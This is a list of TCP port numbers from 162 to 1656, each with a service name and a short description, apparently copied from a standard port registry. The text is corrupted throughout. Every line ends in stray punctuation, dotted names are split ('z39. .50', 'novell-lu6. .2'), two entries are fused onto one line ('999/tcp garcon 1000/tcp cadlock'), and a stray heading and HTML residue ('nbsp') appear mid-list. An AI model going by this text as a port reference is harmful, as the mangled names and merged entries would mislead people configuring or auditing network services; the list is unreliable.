162/tcp snmptrap SNMPTRAP. .


163/tcp cmip-man CMIP/TCP Manager 。.


164/tcp cmip-agent CMIP / TCP Agent. .


165/tcp xns-courier Xerox 。.


166/tcp s-net Sirius Systems. .


167/tcp namp NAMP 。.


168/tcp rsvd RSVD. .


169/tcp send SEND 。.


170/tcp print-srv Network PostScript. .


171/tcp multiplex Network Innovations Multiplex 。.


172/tcp cl / 1 Network Innovations CL / 1. .


173/tcp xyplex-mux Xyplex 。.


174/tcp mailq MAILQ. .


175/tcp vmnet VMNET 。.


176/tcp genrad-mux GENRAD-MUX. .


177/tcp xdmcp X Display Manager Control Protocol 。.


178/tcp nextstep NextStep Window Server. .


179/tcp bgp Border Gateway Protocol 。.


180/tcp ris Intergraph. .


181/tcp unify Unify 。.


182/tcp audit Unisys Audit SITP. .


183/tcp ocbinder OCBinder 。.


184/tcp ocserver OCServer. .


185/tcp remote-kis Remote-KIS 。.


186/tcp kis KIS Protocol. .


187/tcp aci Application Communication Interface 。.


188/tcp mumps Plus Five's MUMPS. .


189/tcp qft Queued File Transport 。.


190/tcp gacp Gateway Access Control Protocol. .


191/tcp prospero Prospero Directory Service 。.


192/tcp osu-nms OSU Network Monitoring System. .


193/tcp srmp Spider Remote Monitoring Protocol 。.


194/tcp irc Internet Relay Chat Protocol. .


195/tcp dn6-nlm-aud DNSIX Network Level Module Audit 。.


196/tcp dn6-smm-red DNSIX Session Mgt Module Audit Redir. .


197/tcp dls Directory Location Service 。.


198/tcp dls-mon Directory Location Service Monitor. .


199/tcp smux SMUX 。.


200/tcp src IBM System Resource Controller. .


201/tcp at-rtmp AppleTalk Routing Maintenance 。.


202/tcp at-nbp AppleTalk Name Binding. .


203/tcp at-3 AppleTalk Unused 。.


204/tcp at-echo AppleTalk Echo. .


205/tcp at-5 AppleTalk Unused 。.


206/tcp at-zis AppleTalk Zone Information. .


207/tcp at-7 AppleTalk Unused 。.


208/tcp at-8 AppleTalk Unused. .


209/tcp qmtp The Quick Mail Transfer Protocol 。.


210/tcp z39. .50 ANSI Z39. .50. .


211/tcp 914c/g Texas Instruments 914C/G Terminal 。.


212/tcp anet ATEXSSTR. .


214/tcp vmpwscs VM PWSCS 。.


215/tcp softpc Insignia Solutions. .


216/tcp CAIlic Computer Associates Int‘l License Server 。.


217/tcp dbase dBASE Unix. .


218/tcp mpp Netix Message Posting Protocol 。.


219/tcp uarps Unisys ARPs. .


220/tcp imap3 Interactive Mail Access Protocol v3 。.


221/tcp fln-spx Berkeley rlogind with SPX auth. .


222/tcp rsh-spx Berkeley rshd with SPX auth 。.


223/tcp cdc Certificate Distribution Center. .


242/tcp direct Direct 。.


243/tcp sur-meas Survey Measurement. .


244/tcp dayna Dayna 。.


245/tcp link LINK. .


246/tcp dsp3270 Display Systems Protocol 。.


247/tcp subntbcst_tftp SUBNTBCST_TFTP. .


248/tcp bhfhs bhfhs 。.


256/tcp rap RAP. .


257/tcp set Secure Electronic Transaction 。.


258/tcp yak-chat Yak Winsock Personal Chat. .


259/tcp esro-gen Efficient Short Remote Operations 。.


260/tcp openport Openport. .


263/tcp hdap HDAP 。.


264/tcp bgmp BGMP. .


280/tcp http-mgmt http-mgmt 。.


309/tcp entrusttime EntrustTime. .


310/tcp bhmds bhmds 。.


312/tcp vslmp VSLMP. .


315/tcp dpsi DPSI 。.


316/tcp decauth decAuth. .


317/tcp zannet Zannet 。.


321/tcp pip PIP. .


344/tcp pdap Prospero Data Access Protocol 。.


345/tcp pawserv Perf Analysis Workbench. .


346/tcp zserv Zebra server 。.


347/tcp fatserv Fatmen Server. .


348/tcp csi-sgwp Cabletron Management Protocol 。.


349/tcp mftp mftp. .


351/tcp matip-type-b MATIP Type B 。.


351/tcp bhoetty bhoetty (added 5/21/97). .


353/tcp ndsauth NDSAUTH 。.


354/tcp bh611 bh611. .


357/tcp bhevent bhevent 。.


362/tcp srssend SRS Send. .


365/tcp dtk DTK 。.


366/tcp odmr ODMR. .


368/tcp qbikgdp QbikGDP 。.


371/tcp clearcase Clearcase. .


372/tcp ulistproc ListProcessor 。.


373/tcp legent-1 Legent Corporation. .


374/tcp legent-2 。.


374/tcp legent-2 Legent Corporation. .


375/tcp hassle Hassle 。.


376/tcp nip Amiga Envoy Network Inquiry Proto. .


377/tcp tnETOS NEC Corporation 。.


378/tcp dsETOS NEC Corporation. .


379/tcp is99c TIA/EIA/IS-99 modem client 。.


380/tcp is99s TIA/EIA/IS-99 modem server. .


381/tcp hp-collector hp performance data collector 。.


383/tcp hp-alarm-mgr hp performance data alarm manager. .


384/tcp arns A Remote Network Server System 。.


385/tcp ibm-app IBM Application. .


386/tcp asa ASA Message Router Object Def。.


387/tcp aurp Appletalk Update-Based Routing Pro. .


388/tcp unidata-ldm Unidata LDM Version 4 。.


389/tcp ldap Lightweight Directory Access Protocol. .


390/tcp uis UIS 。.


391/tcp synotics-relay SynOptics SNMP Relay Port. .


393/tcp dis Data Interpretation System 。.


394/tcp embl-ndt EMBL Nucleic Data Transfer. .


395/tcp netcp NETscout Control Protocol 。.


396/tcp netware-ip Novell Netware over IP. .


397/tcp mptn Multi Protocol Trans。. Net。.


398/tcp kryptolan Kryptolan. .


399/tcp iso-tsap-c2 ISO Transport Class 2 Non-Control over TCP 。.


400/tcp work-sol Workstation Solutions. .


401/tcp ups Uninterruptible Power Supply 。.


402/tcp genie Genie Protocol. .


403/tcp decap decap 。.


404/tcp nced nced. .


405/tcp ncld ncld 。.


406/tcp imsp Interactive Mail Support Protocol. .


407/tcp timbuktu Timbuktu 。.


408/tcp prm-sm Prospero Resource Manager Sys. . Man. .


409/tcp prm-nm Prospero Resource Manager Node Man。.


410/tcp decladebug DECLadebug Remote Debug Protocol. .


411/tcp rmt Remote MT Protocol 。.


412/tcp synoptics-trap Trap Convention Port. .


413/tcp smsp SMSP 。.


414/tcp infoseek InfoSeek. .


415/tcp bnet BNet 。.


416/tcp silverplatter Silverplatter. .


417/tcp onmux Onmux 。.


418/tcp hyper-g Hyper-G. .


419/tcp ariel1 Ariel 。.


420/tcp smpte SMPTE. .


421/tcp ariel2 Ariel 。.


422/tcp ariel3 Ariel. .


423/tcp opc-job-start IBM Operations Planning and Control Start 。.


424/tcp opc-job-track IBM Operations Planning and Control Track. .


425/tcp icad-el ICAD 。.


426/tcp smartsdp smartsdp. .


427/tcp svrloc Server Location 。.


428/tcp ocs_cmu OCS_CMU. .


429/tcp ocs_amu OCS_AMU 。.


430/tcp utmpsd UTMPSD. .


431/tcp utmpcd UTMPCD 。.


432/tcp iasd IASD. .


433/tcp nnsp NNSP 。.


434/tcp mobileip-agent MobileIP-Agent. .


435/tcp mobilip-mn MobilIP-MN 。.


436/tcp dna-cml DNA-CML. .


437/tcp comscm comscm 。.


438/tcp dsfgw dsfgw. .


439/tcp dasp dasp Thomas Obermair 。.


440/tcp sgcp sgcp. .


441/tcp decvms-sysmgt decvms-sysmgt 。.


442/tcp cvc_hostd cvc_hostd. .


443/tcp https http protocol over TLS/SSL 。.


444/tcp snpp Simple Network Paging Protocol. .


445/tcp microsoft-ds Microsoft-DS 。.


446/tcp ddm-rdb DDM-RDB. .


447/tcp ddm-dfm DDM-RFM 。.


448/tcp ddm-ssl DDM-SSL. .


449/tcp as-servermap AS Server Mapper 。.


450/tcp tserver TServer. .


451/tcp sfs-smp-net Cray Network Semaphore server 。.


453/tcp creativeserver CreativeServer. .


454/tcp contentserver ContentServer 。.


455/tcp creativepartnr CreativePartnr. .


456/tcp macon-tcp macon-tcp 。.


457/tcp scohelp scohelp. .


458/tcp appleqtc apple quick time 。.


459/tcp ampr-rcmd ampr-rcmd. .


460/tcp skronk skronk 。.


461/tcp datasurfsrv DataRampSrv. .


462/tcp datasurfsrvsec DataRampSrvSec 。.


463/tcp alpes alpes. .


464/tcp kpasswd kpasswd 。.


465/tcp smtps smtp protocol over TLS / SSL (was ssmtp). .


466/tcp digital-vrc digital-vrc 。.


467/tcp mylex-mapd mylex-mapd. .


468/tcp photuris proturis 。.


469/tcp rcp Radio Control Protocol. .


470/tcp scx-proxy scx-proxy 。.


471/tcp mondex Mondex. .


472/tcp ljk-login ljk-login 。.


473/tcp hybrid-pop hybrid-pop. .


474/tcp tn-tl-w1 tn-tl-w1 。.


475/tcp tcpnethaspsrv tcpnethaspsrv. .


476/tcp tn-tl-fd1 tn-tl-fd1 。.


477/tcp ss7ns ss7ns. .


478/tcp spsc spsc 。.


479/tcp iafserver iafserver. .


480/tcp iafdbase iafdbase 。.


481/tcp ph Ph service. .


482/tcp bgs-nsi bgs-nsi 。.


483/tcp ulpnet ulpnet. .


484/tcp integra-sme Integra Software Management Environment 。.


485/tcp powerburst Air Soft Power Burst. .


486/tcp avian avian 。.


487/tcp saft saft Simple Asynchronous File Transfer. .


488/tcp gss-http gss-http 。.


489/tcp nest-protocol nest-protocol. .


490/tcp micom-pfs micom-pfs 。.


491/tcp go-login go-login. .


492/tcp ticf-1 Transport Independent Convergence for FNA 。.


493/tcp ticf-2 Transport Independent Convergence for FNA. .


494/tcp pov-ray POV-Ray 。.


495/tcp intecourier intecourier. .


496/tcp pim-rp-disc PIM-RP-DISC 。.


497/tcp dantz dantz. .


498/tcp siam siam 。.


499/tcp iso-ill ISO ILL Protocol. .


500/tcp isakmp isakmp 。.


501/tcp stmf STMF. .


502/tcp asa-appl-proto asa-appl-proto 。.


503/tcp intrinsa Intrinsa. .


504/tcp citadel citadel 。.


505/tcp mailbox-lm mailbox-lm. .


506/tcp ohimsrv ohimsrv 。.


507/tcp crs crs. .


508/tcp xvttp xvttp 。.


509/tcp snare snare. .


510/tcp fcp FirstClass Protocol 。.


511/tcp passgo PassGo. .


512/tcp exec remote process execution; 。.


513/tcp login remote login a la telnet;. .


514/tcp shell cmd 。.


515/tcp printer spooler. .


516/tcp videotex videotex 。.


517/tcp talk like tenex link, but across. .


518/tcp ntalk 。.


519/tcp utime unixtime. .


520/tcp efs extended file name server 。.


521/tcp ripng ripng. .


522/tcp ulp ULP 。.


523/tcp ibm-db2 IBM-DB2. .


524/tcp ncp NCP 。.


525/tcp timed timeserver. .


526/tcp tempo newdate 。.


527/tcp stx Stock IXChange. .


528/tcp custix Customer IXChange 。.


529/tcp irc-serv IRC-SERV. .


530/tcp courier rpc 。.


531/tcp conference chat. .


532/tcp netnews readnews 。.


533/tcp netwall for emergency broadcasts. .


534/tcp mm-admin MegaMedia Admin 。.


535/tcp iiop iiop. .


536/tcp opalis-rdv opalis-rdv 。.


537/tcp nmsp Networked Media Streaming Protocol. .


538/tcp gdomap gdomap 。.


539/tcp apertus-ldp Apertus Technologies Load Determination. .


540/tcp uucp uucpd 。.


541/tcp uucp-rlogin uucp-rlogin. .


542/tcp commerce commerce 。.


543/tcp klogin. .


544/tcp kshell krcmd 。.


545/tcp appleqtcsrvr appleqtcsrvr. .


546/tcp dhcpv6-client DHCPv6 Client 。.


547/tcp dhcpv6-server DHCPv6 Server. .


548/tcp afpovertcp AFP over TCP 。.


549/tcp idfp IDFP. .


550/tcp new-rwho new-who 。.


551/tcp cybercash cybercash. .


552/tcp deviceshare deviceshare 。.


553/tcp pirp pirp. .


554/tcp rtsp Real Time Stream Control Protocol 。.


555/tcp dsf. .


556/tcp remotefs rfs server 。.


557/tcp openvms-sysipc openvms-sysipc. .


558/tcp sdnskmp SDNSKMP 。.


559/tcp teedtap TEEDTAP. .


560/tcp rmonitor rmonitord 。.


561/tcp monitor. .


562/tcp chshell chcmd 。.


563/tcp nntps nntp protocol over TLS / SSL (was snntp). .


564/tcp 9pfs plan 9 file service 。.


565/tcp whoami whoami. .


566/tcp streettalk streettalk 。.


567/tcp banyan-rpc banyan-rpc. .


568/tcp ms-shuttle microsoft shuttle 。.


569/tcp ms-rome microsoft rome. .


570/tcp meter demon 。.


571/tcp meter udemon. .


572/tcp sonar sonar 。.


573/tcp banyan-vip banyan-vip. .


574/tcp ftp-agent FTP Software Agent System 。.


575/tcp vemmi VEMMI. .


576/tcp ipcd ipcd 。.


577/tcp vnas vnas. .


578/tcp ipdd ipdd 。.


579/tcp decbsrv decbsrv. .


581/tcp bdp Bundle Discovery Protocol 。.


588/tcp cal CAL. .


589/tcp eyelink EyeLink 。.


590/tcp tns-cml TNS CML. .


593/tcp http-rpc-epmap HTTP RPC Ep Map 。.


594/tcp tpip TPIP. .


596/tcp smsd SMSD 。.


599/tcp acp Aeolon Core Protocol. .


600/tcp ipcserver Sun IPC server 。.


606/tcp urm Cray Unified Resource Manager. .


607/tcp nqs nqs 。.


608/tcp sift-uft Sender-Initiated/Unsolicited File Transfer. .


609/tcp npmp-trap npmp-trap 。.


610/tcp npmp-local npmp-local. .


611/tcp npmp-gui npmp-gui 。.


613/tcp hmmp-op HMMP Operation. .


620/tcp sco-websrvrmgr SCO WebServer Manager 。.


621/tcp escp-ip ESCP. .


625/tcp dec_dlm DEC DLM 。.


626/tcp asia ASIA. .


628/tcp qmqp QMQP 。.


630/tcp rda RDA. .


631/tcp ipp IPP (Internet Printing Protocol) 。.


632/tcp bmpp bmpp. .


634/tcp ginad ginad 。.


635/tcp rlzdbase RLZ DBase. .


636/tcp ldaps ldap protocol over TLS/SSL (was sldap) 。.


637/tcp lanserver lanserver. .


639/tcp msdp MSDP 。.


666/tcp doom doom Id Software. .


667/tcp disclose campaign contribution disclosures – SDR Technologies 。.


668/tcp mecomm MeComm. .


669/tcp meregister MeRegister 。.


670/tcp vacdsm-sws VACDSM-SWS. .


671/tcp vacdsm-app VACDSM-APP 。.


672/tcp vpps-qua VPPS-QUA. .


673/tcp cimplex CIMPLEX 。.


674/tcp acap ACAP. .


675/tcp dctp DCTP 。.


704/tcp elcsd errlog copy / server daemon. .


705/tcp agentx AgentX 。.


709/tcp entrust-kmsh Entrust Key Management Service Handler. .


710/tcp entrust-ash Entrust Administration Service Handler 。.


729/tcp netviewdm1 IBM NetView DM/6000 Server / Client. .


730/tcp netviewdm2 IBM NetView DM/6000 send/tcp 。.


731/tcp netviewdm3 IBM NetView DM/6000 receive / tcp. .


741/tcp netgw netGW 。.


742/tcp netrcs Network based Rev. . Cont. . Sys. .


744/tcp flexlm Flexible License Manager 。.


747/tcp fujitsu-dev Fujitsu Device Control. .


748/tcp ris-cm Russell Info Sci Calendar Manager 。.


749/tcp kerberos-adm kerberos administration. .


750/tcp rfile 。.


751/tcp pump. .


752/tcp qrh 。.


753/tcp rrh. .


754/tcp tell send 。.


758/tcp nlogin. .


759/tcp con 。.


760/tcp ns. .


761/tcp rxe 。.


762/tcp quotad. .


763/tcp cycleserv 。.


764/tcp omserv. .


765/tcp webster 。.


769/tcp vid. .


770/tcp cadlock 。.


771/tcp rtip. .


772/tcp cycleserv2 。.


773/tcp submit. .


774/tcp rpasswd 。.


776/tcp wpages. .


780/tcp wpgs 。.


786/tcp concert Concert. .


787/tcp qsc QSC 。.


801/tcp device. .


873/tcp rsync rsync 。.


886/tcp iclcnet-locate ICL coNETion locate server. .


887/tcp iclcnet_svinfo ICL coNETion server info 。.


888/tcp accessbuilder AccessBuilder. .


900/tcp omginitialrefs OMG Initial Refs 。.


911/tcp xact-backup xact-backup. .


990/tcp ftps ftp protocol, control, over TLS/SSL 。.


991/tcp nas Netnews Administration System. .


992/tcp telnets telnet protocol over TLS/SSL 。.


993/tcp imaps imap4 protocol over TLS / SSL. .


994/tcp ircs irc protocol over TLS/SSL 。.


995/tcp pop3s pop3 protocol over TLS / SSL (was spop3). .


996/tcp vsinet vsinet 。.


997/tcp maitrd. .


998/tcp busboy 。.


999/tcp garcon 1000/tcp cadlock. .


1010/tcp surf surf 。.


1023/tcp Reserved Reserved. .


1030/tcp iad1 BBN IAD 。.


1031/tcp iad2 BBN IAD. .


1032/tcp iad3 BBN IAD 。.


1047/tcp neod1 Sun's NEO Object Request Broker. .


1048/tcp neod2 Sun‘s NEO Object Request Broker 。.


1058/tcp nim nim. .


1059/tcp nimreg nimreg 。.


1067/tcp instl_boots Installation Bootstrap Proto. . Serv. .


1068/tcp instl_bootc Installation Bootstrap Proto。. Cli。.


1080/tcp socks Socks. .


1083/tcp ansoft-lm-1 Anasoft License Manager 。.


1084/tcp ansoft-lm-2 Anasoft License Manager. .


1123/tcp murray Murray 。.


1155/tcp nfa Network File Access. .


1212/tcp lupa lupa 。.


1222/tcp nerv SNI R & D network. .


1239/tcp nmsd NMSD 。.


1248/tcp hermes. .


1313/tcp bmc_patroldb BMC_PATROLDB 。.


1314/tcp pdps Photoscript Distributed Printing System. .


1321/tcp pip PIP 。.


1345/tcp vpjp VPJP. .


1346/tcp alta-ana-lm Alta Analytics License Manager 。.


1347/tcp bbn-mmc multi media conferencing. .


1348/tcp bbn-mmx multi media conferencing 。.


1349/tcp sbook Registration Network Protocol. .


1350/tcp editbench Registration Network Protocol 。.


1352/tcp lotusnote Lotus Note. .


1353/tcp relief Relief Consulting 。.


1354/tcp rightbrain RightBrain Software. .


1355/tcp intuitive-edge Intuitive Edge 。.


1356/tcp cuillamartin CuillaMartin Company. .


1357/tcp pegboard Electronic PegBoard 。.


1358/tcp connlcli CONNLCLI. .


1359/tcp ftsrv FTSRV 。.


1360/tcp mimer MIMER. .


1361/tcp linx LinX 。.


1362/tcp timeflies TimeFlies. .


1363/tcp ndm-requester Network DataMover Requester 。.


1364/tcp ndm-server Network DataMover Server. .


1365/tcp adapt-sna Network Software Associates 。.


1366/tcp netware-csp Novell NetWare Comm Service Platform. .


1367/tcp dcs DCS 。.


1368/tcp screencast ScreenCast. .


1369/tcp gv-us GlobalView to Unix Shell 。.


1370/tcp us-gv Unix Shell to GlobalView. .


1371/tcp fc-cli Fujitsu Config Protocol 。.


1372/tcp fc-ser Fujitsu Config Protocol. .


1373/tcp chromagrafx Chromagrafx 。.


1374/tcp molly EPI Software Systems. .


1375/tcp bytex Bytex 。.


1376/tcp ibm-pps IBM Person to Person Software. .


1377/tcp cichlid Cichlid License Manager 。.


1378/tcp elan Elan License Manager. .


1379/tcp dbreporter Integrity Solutions 。.


1380/tcp telesis-licman Telesis Network License Manager. .


1381/tcp apple-licman Apple Network License Manager 。.


1382/tcp udt_os. .


1383/tcp gwha GW Hannaway Network License Manager 。.


1384/tcp os-licman Objective Solutions License Manager. .


1385/tcp atex_elmd Atex Publishing License Manager 。.


1386/tcp checksum CheckSum License Manager. .


1387/tcp cadsi-lm Computer Aided Design Software Inc LM 。.


1388/tcp objective-dbc Objective Solutions DataBase Cache. .


1389/tcp iclpv-dm document。.nbspManager 。.


1390/tcp iclpv-sc Storage Controller. .


1391/tcp iclpv-sas Storage Access Server 。.


1392/tcp iclpv-pm Print Manager. .


1393/tcp iclpv-nls Network Log Server 。.


1394/tcp iclpv-nlc Network Log Client. .


1395/tcp iclpv-wsm PC Workstation Manager software 。.


1396/tcp dvl-activemail DVL Active Mail. .


1399/tcp cadkey-licman Cadkey License Manager。.


Common Port Description:. .


1400/tcp cadkey-tablet Cadkey Tablet Daemon 。.


1402/tcp prm-sm-np Prospero Resource Manager. .


1403/tcp prm-nm-np Prospero Resource Manager 。.


1404/tcp igi-lm Infinite Graphics License Manager. .


1405/tcp ibm-res IBM Remote Execution Starter 。.


1406/tcp netlabs-lm NetLabs License Manager. .


1407/tcp dbsa-lm DBSA License Manager 。.


1408/tcp sophia-lm Sophia License Manager. .


1409/tcp here-lm Here License Manager 。.


1410/tcp hiq HiQ License Manager. .


1411/tcp af AudioFile 。.


1412/tcp innosys InnoSys. .


1413/tcp innosys-acl Innosys-ACL 。.


1414/tcp ibm-mqseries IBM MQSeries. .


1415/tcp dbstar DBStar 。.


1416/tcp novell-lu6. .2 Novell LU6. .2. .


1417/tcp timbuktu-srv1 Timbuktu Service 1 Port 。.


1418/tcp timbuktu-srv2 Timbuktu Service 2 Port. .


1419/tcp timbuktu-srv3 Timbuktu Service 3 Port 。.


1420/tcp timbuktu-srv4 Timbuktu Service 4 Port. .


1421/tcp gandalf-lm Gandalf License Manager 。.


1422/tcp autodesk-lm Autodesk License Manager. .


1423/tcp essbase Essbase Arbor Software 。.


1424/tcp hybrid Hybrid Encryption Protocol. .


1425/tcp zion-lm Zion Software License Manager 。.


1426/tcp sais Satellite-data Acquisition System 1. .


1427/tcp mloadd mloadd monitoring tool 。.


1428/tcp informatik-lm Informatik License Manager. .


1429/tcp nms Hypercom NMS 。.


1430/tcp tpdu Hypercom TPDU. .


1431/tcp rgtp Reverse Gossip Transport 。.


1432/tcp blueberry-lm Blueberry Software License Manager. .


1433/tcp ms-sql-s Microsoft-SQL-Server 。.


1434/tcp ms-sql-m Microsoft-SQL-Monitor. .


1435/tcp ibm-cics IBM CICS 。.


1436/tcp saism Satellite-data Acquisition System 2. .


1437/tcp tabula Tabula 。.


1438/tcp eicon-server Eicon Security Agent / Server. .


1439/tcp eicon-x25 Eicon X25/SNA Gateway 。.


1440/tcp eicon-slp Eicon Service Location Protocol. .


1441/tcp cadis-1 Cadis License Management 。.


1442/tcp cadis-2 Cadis License Management. .


1443/tcp ies-lm Integrated Engineering Software 。.


1444/tcp marcam-lm Marcam License Management. .


1445/tcp proxima-lm Proxima License Manager 。.


1446/tcp ora-lm Optical Research Associates License Manager. .


1447/tcp apri-lm Applied Parallel Research LM 。.


1448/tcp oc-lm OpenConnect License Manager. .


1449/tcp peport PEport 。.


1450/tcp dwf Tandem Distributed Workbench Facility. .


1451/tcp infoman IBM Information Management 。.


1452/tcp gtegsc-lm GTE Government Systems License Man. .


1453/tcp genie-lm Genie License Manager 。.


1454/tcp interhdl_elmd interHDL License Manager. .


1455/tcp esl-lm ESL License Manager 。.


1456/tcp dca DCA. .


1457/tcp valisys-lm Valisys License Manager 。.


1458/tcp nrcabq-lm Nichols Research Corp. .


1459/tcp proshare1 Proshare Notebook Application 。.


1460/tcp proshare2 Proshare Notebook Application. .


1461/tcp ibm_wrless_lan IBM Wireless LAN 。.


1462/tcp world-lm World License Manager. .


1463/tcp nucleus Nucleus 。.


1464/tcp msl_lmd MSL License Manager. .


1465/tcp pipes Pipes Platform 。.


1466/tcp oceansoft-lm Ocean Software License Manager. .


1467/tcp csdmbase CSDMBASE 。.


1468/tcp csdm CSDM. .


1469/tcp aal-lm Active Analysis Limited License Manager 。.


1470/tcp uaiact Universal Analytics. .


1471/tcp csdmbase csdmbase 。.


1472/tcp csdm csdm. .


1473/tcp openmath OpenMath 。.


1474/tcp telefinder Telefinder. .


1475/tcp taligent-lm Taligent License Manager 。.


1476/tcp clvm-cfg clvm-cfg. .


1477/tcp ms-sna-server ms-sna-server 。.


1478/tcp ms-sna-base ms-sna-base. .


1479/tcp dberegister dberegister 。.


1480/tcp pacerforum PacerForum. .


1481/tcp airs AIRS 。.


1482/tcp miteksys-lm Miteksys License Manager. .


1483/tcp afs AFS License Manager 。.


1484/tcp confluent Confluent License Manager. .


1485/tcp lansource LANSource 。.


1486/tcp nms_topo_serv nms_topo_serv. .


1487/tcp localinfosrvr LocalInfoSrvr 。.


1488/tcp docstor DocStor. .


1489/tcp dmdocbroker dmdocbroker 。.


1490/tcp insitu-conf insitu-conf. .


1491/tcp anynetgateway anynetgateway 。.


1492/tcp stone-design-1 stone-design-1. .


1493/tcp netmap_lm netmap_lm 。.


1494/tcp ica ica. .


1495/tcp cvc cvc 。.


1496/tcp liberty-lm liberty-lm. .


1497/tcp rfx-lm rfx-lm 。.


1498/tcp sybase-sqlany Sybase SQL Any. .


1499/tcp fhc Federico Heinz Consultora 。.


1500/tcp vlsi-lm VLSI License Manager. .


1501/tcp saiscm Satellite-data Acquisition System 3 。.


1502/tcp shivadiscovery Shiva. .


1503/tcp imtc-mcs Databeam 。.


1504/tcp evb-elm EVB Software Engineering License Manager. .


1505/tcp funkproxy Funk Software, Inc。.


1506/tcp utcd Universal Time daemon (utcd). .


1507/tcp symplex symplex 。.


1508/tcp diagmond diagmond. .


1509/tcp robcad-lm Robcad, Ltd。. License Manager 。.


1510/tcp mvx-lm Midland Valley Exploration Ltd. . Lic. . Man. .


1511/tcp 3l-l1 3l-l1 。.


1512/tcp wins Microsoft's Windows Internet Name Service. .


1513/tcp fujitsu-dtc Fujitsu Systems Business of America, Inc 。.


1514/tcp fujitsu-dtcns Fujitsu Systems Business of America, Inc. .


1515/tcp ifor-protocol ifor-protocol 。.


1516/tcp vpad Virtual Places Audio data. .


1517/tcp vpac Virtual Places Audio control 。.


1518/tcp vpvd Virtual Places Video data. .


1519/tcp vpvc Virtual Places Video control 。.


1520/tcp atm-zip-office atm zip office. .


1521/tcp ncube-lm nCube License Manager 。.


1522/tcp ricardo-lm Ricardo North America License Manager. .


1523/tcp cichild-lm cichild 。.


1525/tcp orasrv oracle. .


1525/tcp prospero-np Prospero Directory Service non-priv 。.


1526/tcp pdap-np Prospero Data Access Prot non-priv. .


1527/tcp tlisrv oracle 。.


1528/tcp mciautoreg micautoreg. .


1529/tcp coauthor oracle 。.


1530/tcp rap-service rap-service. .


1531/tcp rap-listen rap-listen 。.


1532/tcp miroconnect miroconnect. .


1533/tcp virtual-places Virtual Places Software 。.


1534/tcp micromuse-lm micromuse-lm. .


1535/tcp ampr-info ampr-info 。.


1536/tcp ampr-inter ampr-inter. .


1537/tcp sdsc-lm isi-lm 。.


1538/tcp 3ds-lm 3ds-lm. .


1539/tcp intellistor-lm Intellistor License Manager 。.


1540/tcp rds rds. .


1541/tcp rds2 rds2 。.


1542/tcp gridgen-elmd gridgen-elmd. .


1543/tcp simba-cs simba-cs 。.


1544/tcp aspeclmd aspeclmd. .


1545/tcp vistium-share vistium-share 。.


1546/tcp abbaccuray abbaccuray. .


1547/tcp laplink laplink 。.


1548/tcp axon-lm Axon License Manager. .


1549/tcp shivahose Shiva Hose 。.


1550/tcp 3m-image-lm Image Storage license manager 3M Company. .


1551/tcp hecmtl-db HECMTL-DB 。.


1552/tcp pciarray pciarray. .


1553/tcp sna-cs sna-cs 。.


1554/tcp caci-lm CACI Products Company License Manager. .


1555/tcp livelan livelan 。.


1556/tcp ashwin AshWin CI Tecnologies. .


1557/tcp arbortext-lm ArborText License Manager 。.


1558/tcp xingmpeg xingmpeg. .


1559/tcp web2host web2host 。.


1560/tcp asci-val asci-val. .


1561/tcp facilityview facilityview 。.


1562/tcp pconnectmgr pconnectmgr. .


1563/tcp cadabra-lm Cadabra License Manager 。.


1564/tcp pay-per-view Pay-Per-View. .


1565/tcp winddlb WinDD 。.


1566/tcp corelvideo CORELVIDEO. .


1567/tcp jlicelmd jlicelmd 。.


1568/tcp tsspmap tsspmap. .


1569/tcp ets ets 。.


1570/tcp orbixd orbixd. .


1571/tcp rdb-dbs-disp Oracle Remote Data Base 。.


1572/tcp chip-lm Chipcom License Manager. .


1573/tcp itscomm-ns itscomm-ns 。.


1574/tcp mvel-lm mvel-lm. .


1575/tcp oraclenames oraclenames 。.


1576/tcp moldflow-lm moldflow-lm. .


1577/tcp hypercube-lm hypercube-lm 。.


1578/tcp jacobus-lm Jacobus License Manager. .


1579/tcp ioc-sea-lm ioc-sea-lm 。.


1580/tcp tn-tl-r1 tn-tl-r1. .


1581/tcp mil-2045-47001 MIL-2045-47001 。.


1582/tcp msims MSIMS. .


1583/tcp simbaexpress simbaexpress 。.


1584/tcp tn-tl-fd2 tn-tl-fd2. .


1585/tcp intv intv 。.


1586/tcp ibm-abtact ibm-abtact. .


1587/tcp pra_elmd pra_elmd 。.


1588/tcp triquest-lm triquest-lm. .


1589/tcp vqp VQP 。.


1590/tcp gemini-lm gemini-lm. .


1591/tcp ncpm-pm ncpm-pm 。.


1592/tcp commonspace commonspace. .


1593/tcp mainsoft-lm mainsoft-lm 。.


1594/tcp sixtrak sixtrak. .


1595/tcp radio radio 。.


1596/tcp radio-sm radio-sm. .


1597/tcp orbplus-iiop orbplus-iiop 。.


1598/tcp picknfs picknfs. .


1599/tcp simbaservices simbaservices 。.


1600/tcp issd. .


1601/tcp aas aas 。.


1602/tcp inspect inspect. .


1603/tcp picodbc pickodbc 。.


1604/tcp icabrowser icabrowser. .


1605/tcp slp Salutation Manager (Salutation Protocol) 。.


1606/tcp slm-api Salutation Manager (SLM-API). .


1607/tcp stt stt 。.


1608/tcp smart-lm Smart Corp. . License Manager. .


1609/tcp isysg-lm isysg-lm 。.


1610/tcp taurus-wh taurus-wh. .


1611/tcp ill Inter Library Loan 。.


1612/tcp netbill-trans NetBill Transaction Server. .


1613/tcp netbill-keyrep NetBill Key Repository 。.


1614/tcp netbill-cred NetBill Credential Server. .


1615/tcp netbill-auth NetBill Authorization Server 。.


1616/tcp netbill-prod NetBill Product Server. .


1617/tcp nimrod-agent Nimrod Inter-Agent Communication 。.


1618/tcp skytelnet skytelnet. .


1619/tcp xs-openstorage xs-openstorage 。.


1620/tcp faxportwinport faxportwinport. .


1621/tcp softdataphone softdataphone 。.


1622/tcp ontime ontime. .


1623/tcp jaleosnd jaleosnd 。.


1624/tcp udp-sr-port udp-sr-port. .


1625/tcp svs-omagent svs-omagent 。.


1636/tcp cncp CableNet Control Protocol. .


1637/tcp cnap CableNet Admin Protocol 。.


1638/tcp cnip CableNet Info Protocol. .


1639/tcp cert-initiator cert-initiator 。.


1640/tcp cert-responder cert-responder. .


1641/tcp invision InVision 。.


1642/tcp isis-am isis-am. .


1643/tcp isis-ambc isis-ambc 。.


1645/tcp datametrics datametrics. .


1646/tcp sa-msg-port sa-msg-port 。.


1647/tcp rsap rsap. .


1648/tcp concurrent-lm concurrent-lm 。.


1649/tcp inspect inspect. .


1650/tcp nkd nkd 。.


1651/tcp shiva_confsrvr shiva_confsrvr. .


1652/tcp xnmp xnmp 。.


1653/tcp alphatech-lm alphatech-lm. .


1654/tcp stargatealerts stargatealerts 。.


1655/tcp dec-mbadmin dec-mbadmin. .


1656/tcp dec-mbadmin-h dec-mbadmin-h 。.


